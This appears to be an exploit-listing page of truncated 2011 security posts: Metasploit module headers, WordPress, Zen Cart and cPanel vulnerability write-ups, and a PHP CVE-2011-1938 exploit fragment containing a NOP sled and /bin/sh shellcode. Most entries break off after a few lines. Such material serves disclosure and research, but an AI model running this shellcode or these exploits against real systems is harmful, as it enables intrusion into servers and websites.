Information Security News and Exploits

##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
[...]

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

# Exploit Title: is-human (1.4.2 and prior) Worpdress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the ‘type’ parameter,
when the ‘action’ is set to log-reset. From here we can run out own code.
In [...]

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Trade Line Web <= Remote ‘id’ Funcs SQL-i Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

[*]==================================================================>
[*]
[*] Multiple Vulnerabilities in Zen Cart
[*]
[*] [ Vendor SW ] => Zen Cart – http://www.zen-cart.com
[*] [ Version ] => 1.3.9f, 1.3.9h (but possible all versions)
[*] [ Vendor URL ] => www.zen-cart.com
[*] [ Tested on [...]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go…n";
define(‘EVIL_SPACE_ADDR’, "xffxffxeexb3");
define(‘EVIL_SPACE_SIZE’, 1024*1024*8);
$SHELLCODE =
"x6ax31×58×99xcdx80×89xc3×89xc1×6ax46×58xcdx80xb0".
"x0bx52×68×6ex2fx73×68×68×2fx2fx62×69×89xe3×89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, [...]

##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
[...]

# Exploit Title: cPanel < 11.25 CSRF – Add php script
# Date: 27.05.2011
# Author: ninjashell
# Software Link: http://cpanel.net
# Version: 11.25 (see details below)
# Tested on: Linux
# CVE : N/A
I. Introduction
cPanel versions below and excluding 11.25 , are vulnerable to CSRF which
leads to uploading a PHP script of the attackers liking. If you have turned
off security [...]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]